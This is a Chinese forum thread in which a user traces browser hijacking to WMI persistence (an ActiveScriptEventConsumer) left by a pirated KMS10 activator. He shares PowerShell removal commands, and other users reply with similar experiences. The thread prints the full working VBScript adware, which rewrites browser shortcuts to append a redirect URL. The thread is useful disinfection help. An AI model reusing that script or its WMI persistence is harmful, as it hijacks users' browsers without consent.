【原创】用了KMS10中招, 浏览器老被加尾巴怎么办, 看过来

sheds

装了Win10, 要激活, 于是论坛下载了一个KMS10激活, (我是很相信论坛的啊, 没想到...)
结果浏览器总是被加小尾巴跳转到hao123

系统目录的KMS10文件夹删除了, 注册表搜索删除了. 快捷方式手动清理干净了, 可是没用啊
没用啊, 怎么办... Explorer进程加载的DLL 系统服务, 观察一圈没发现异常啊.  网上百度, Google好多圈
一点用也没, 都是些抄来抄去的贴子.  重装系统, 这不符合我的风格呀(其实是软件太多, 重装太麻烦)

于是装了一个火绒(这里没有推广的意思,本来想装个COMODO的, 结果不支持WIN10), 用HIPS发现

scrcons.exe 他在修改快捷方式. 于是百度之, 引出来WMI, 仔细一看, 乖乖, 三无后门
(“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer)


于是网上下载了一个工具WIMExplorer 这里贴个下载地址 http://www.ks-soft.net/hostmon.eng/wmi/
一看 ActiveScriptEventConsumer 里面果然有一个vbs脚本再一看内容, 这不正是查找多日的小尾巴吗, 果断删除
从此世界清静了

看看小尾巴的脚本

1. On Error Resume Next
   
2. Const link = "http://hao.qquu8.com/?v=108&m=yx"
   
3. Const link360 = "http://hao.qquu8.com/?v=108&m=yx&s=3"
   
4. browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
   
5. lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
   
6. browsersArr = Split(browsers,",")
   
7. Set oDic = CreateObject("scripting.dictionary")
   
8. For Each browser In browsersArr
   
9.     oDic.Add LCase(browser), browser
   
10. Next
    
11. lnkpathsArr = Split(lnkpaths,",")
    
12. Set oFolders = CreateObject("scripting.dictionary")
    
13. For Each lnkpath In lnkpathsArr
    
14.     oFolders.Add lnkpath, lnkpath
    
15. Next
    
16. Set fso = CreateObject("Scripting.Filesystemobject")
    
17. Set WshShell = CreateObject("Wscript.Shell")
    
18. For Each oFolder In oFolders
    
19.     If fso.FolderExists(oFolder) Then
    
20.         For Each file In fso.GetFolder(oFolder).Files
    
21.             If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
    
22.                 Set oShellLink = WshShell.CreateShortcut(file.Path)
    
23.                 path = oShellLink.TargetPath
    
24.                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
    
25.                 If oDic.Exists(LCase(name)) Then
    
26.                     If LCase(name) = LCase("360se.exe") Then
    
27.                         oShellLink.Arguments = link360
    
28.                     Else
    
29.                         oShellLink.Arguments = link
    
30.                     End If
    
31.                     If file.Attributes And 1 Then
    
32.                         file.Attributes = file.Attributes - 1
    
33.                     End If
    
34.                     oShellLink.Save
    
35.                 End If
    
36.             End If
    
37.         Next
    
38.     End If
    
39. Next
    

复制代码

WMI查看工具

edgu

不用下载任何工具

看清楚后缀是什么，注册表和c盘windows文件夹里删干净

桌面IE快捷方式删掉，换个纯净的上去

sheds

除非你重装系统, 否则你查找文件注册表绝对找不到这个东西
不相信你下载一个激活试试

edgu

QUOTE:

sheds 发表于 2016-3-20 15:50
除非你重装系统, 否则你查找文件注册表绝对找不到这个东西
不相信你下载一个激活试试

别说这么绝对，这个月刚把一台机器里的IE改好了

也是在软件区下载了软件，然后中招

主页被改成了hao123，IE地址后缀是四个字母，具体记不得了

Revival

无孔不入啊 从WIN7年代到WIN10都是裸奔啊。。。。不知道后续会不会不小心中招

aspan

和相信不相信论坛有什么关系 ，真是够矫情

sheds

QUOTE:

aspan 发表于 2016-3-20 16:08
和相信不相信论坛有什么关系 ，真是够矫情

只是一个玩笑话, 看来是我矫情了

luck108

QUOTE:

sheds 发表于 2016-3-20 15:47
装了Win10, 要激活, 于是论坛下载了一个KMS10激活, (我是很相信论坛的啊, 没想到...)
结果浏览器总是被加 ...

具体是咋操作的？用文本编辑器？谢谢

starwutian

楼主分享一个详细的步骤呗。同样的问题，浏览器被加小尾巴了。

sheds

删除方法:

我这里的情况是如图这样的,用下面的命令方式可以删除病毒

以管理员身份运行PowerShell
执行以下命令(4条命令复制粘贴然后一起执行即可)

gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject

乌黑兔

我的小尾巴好久了都没去掉，下了班回去搞起

freedown

学习新知识。

luck108

QUOTE:

sheds 发表于 2016-3-20 16:55
我这里的情况是如图这样的,你下面的命令方式可以解决

以管理员身份运行PowerShell

谢谢，看明白了

猪在龙年

学习了，曾经多次中招，不得已重装了事

endward

学习了，曾经出现过这种情况，因为系统装有360全家桶，但是360查不出来，找了360的工作人员，他远程各种工具查找问题没找到，最后还是重装系统了事。

277266

看不明白啊！

找到了powershell，谢谢！希望能永远解决，被困扰很久很久了。

无数次诅咒这个网址和这个流氓软件。

中国软件业就是被周红衣这种流氓带向流氓方向的！

labazhou

前段时间也遇到了，这次回家试一下回家测试了一下，果然有这种情况，以前试了好多方法都没有办法，还是51NB好

liuxiao

学习了，也中过招

277266

QUOTE:

edgu 发表于 2016-3-20 15:57
别说这么绝对，这个月刚把一台机器里的IE改好了

也是在软件区下载了软件，然后中招

过几天又不行了！呵呵.....。

当然，有可能你遇到并不是楼主说的这种情况。

如果是楼主说这种情况是绝对地。小马激活刚出来时，觉得挺不错的，原来就是百度养的狗！

kaiser888

非常感谢，困扰很久了

277266

我怎么没有显示10楼？

Bzv

谢谢，楼主，完美解决

琦安L

这么好，谢了！

zyw520_2001

為什麼我測試不行啊一固定到狀態欄就馬上出現了

zhangyongtao - 液晶屏改装

最烦WINDOWS 这一点  
一不小心就中

karonhu

用360治疗这个还是很有效果的

Jeff_Yuan

不会用

cafield2222

good

cafield2222

下了wmiexplorer但是弄不来，界面和2楼截图完全不一样啊。

理想奶牛

刚好遇到这个问题，按楼主方式尝试一下